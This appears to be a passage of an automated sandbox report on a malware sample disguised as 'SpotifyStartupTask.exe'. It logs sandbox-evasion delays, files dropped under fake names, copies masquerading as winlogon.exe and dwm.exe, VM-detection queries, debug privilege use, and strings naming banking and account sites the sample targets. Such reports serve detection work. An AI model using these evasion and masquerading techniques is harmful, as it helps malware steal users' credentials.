                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592906
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592797
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeWindow / User API: threadDelayed 4390
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWindow / User API: threadDelayed 3687
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWindow / User API: threadDelayed 6019
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\Rlqiwetw.log
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\jWsFKvpe.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\LWyBOcEb.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\PMosVZFV.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\vRRUHqel.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\clyyMyKw.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\GFwKqCZT.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\DUQujoOa.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\XUwHpYfn.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\wcHMhvIM.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\YjeiZtnk.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\sMvnZGVS.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeDropped PE file which has not been started: C:\Users\user\Desktop\eKApnDyW.log
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeDropped PE file which has not been started: C:\Users\user\Desktop\YqxhFSUC.log
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -17524406870024063s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -600000s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599874s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599764s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599655s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599547s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599437s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -599324s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -100000s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99891s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99782s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99657s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99532s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99407s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99297s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99188s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -99063s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -98938s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -98801s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -98522s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597500s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597382s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597265s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 2228Thread sleep time: -597156s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 7048Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 6692Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\DiagTrack\dwm.exe TID: 7188Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\DiagTrack\dwm.exe TID: 7216Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe TID: 7300Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exe TID: 7316Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 7276Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 7236Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -24903104499507879s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -600000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -599875s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -599610s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -599438s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 5508Thread sleep time: -10800000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598938s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598766s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598610s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -598250s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597985s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597860s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597749s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597640s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597526s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597415s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597130s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -597016s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596820s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596642s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596500s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 5508Thread sleep time: -1200000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596375s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596266s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596141s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -596031s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595890s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595594s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595465s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595355s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -595250s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -100000s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99872s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99763s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99204s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -99031s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98917s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98802s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98685s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98578s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98464s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98359s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -98250s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593344s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593230s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593124s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -593013s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -592906s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exe TID: 6500Thread sleep time: -592797s >= -30000s
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 7344Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe TID: 7444Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exe TID: 7372Thread sleep time: -922337203685477s >= -30000s
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\DiagTrack\dwm.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\DiagTrack\dwm.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 600000
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599874
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599764
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599655
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599547
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599437
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 599324
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 100000
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99891
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99782
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99657
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99532
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99407
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99297
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99188
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 99063
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 98938
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 98801
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 98522
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597500
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597382
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597265
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 597156
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\DiagTrack\dwm.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 30000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599875
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 599438
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 3600000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598938
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598766
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598610
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 598250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597985
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597860
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597749
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597640
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597526
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597415
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597130
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 597016
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596820
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596642
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596500
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 300000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596375
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596266
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596141
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 596031
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595890
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595594
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595465
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595355
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 595250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 100000
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99872
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99763
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99204
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 99031
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98917
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98802
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98685
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98578
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98464
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98359
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 98250
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593344
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593230
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593124
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 593013
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592906
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeThread delayed: delay time: 592797
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData\Local
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeFile opened: C:\Users\user\AppData\Local\Temp
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                              Source: knl7bHUrFR.29.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                              Source: knl7bHUrFR.29.drBinary or memory string: discord.comVMware20,11696487552f
                              Source: knl7bHUrFR.29.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                              Source: knl7bHUrFR.29.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                              Source: knl7bHUrFR.29.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: global block list test formVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: tasks.office.comVMware20,11696487552o
                              Source: knl7bHUrFR.29.drBinary or memory string: AMC password management pageVMware20,11696487552
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1275218813.000000001BEA0000.00000004.00000020.00020000.00000000.sdmp, JNXeqwRJ1WmUZ.exe, 0000001D.00000002.2478824169.000000001B200000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000027.00000002.1314505737.000001BF8F267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: knl7bHUrFR.29.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                              Source: knl7bHUrFR.29.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: dev.azure.comVMware20,11696487552j
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                              Source: knl7bHUrFR.29.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                              Source: knl7bHUrFR.29.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                              Source: SpotifyStartupTask.exe, 00000000.00000002.1273206692.000000001BD6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\+?
                              Source: knl7bHUrFR.29.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                              Source: knl7bHUrFR.29.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                              Source: knl7bHUrFR.29.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                              Source: knl7bHUrFR.29.drBinary or memory string: outlook.office.comVMware20,11696487552s
                              Source: knl7bHUrFR.29.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                              Source: knl7bHUrFR.29.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                              Source: knl7bHUrFR.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                              Source: knl7bHUrFR.29.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess information queried: ProcessInformation
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess token adjusted: Debug
                              Source: C:\Windows\DiagTrack\dwm.exeProcess token adjusted: Debug
                              Source: C:\Windows\DiagTrack\dwm.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess token adjusted: Debug
                              Source: C:\Program Files (x86)\Google\Update\dxLy2s6A.exeProcess token adjusted: Debug
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess token adjusted: Debug
                              Source: C:\Windows\AppReadiness\JNXeqwRJ1WmUZ.exeProcess token adjusted: Debug
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess token adjusted: Debug
                              Source: C:\Windows\ServiceProfiles\PQ4HCWgZazguIsFyU1PhJ.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\SpotifyStartupTask.exeProcess token adjusted: Debug
                              Source: C:\Program Files\7-Zip\Lang\winlogon.exeProcess token adjusted: Debug
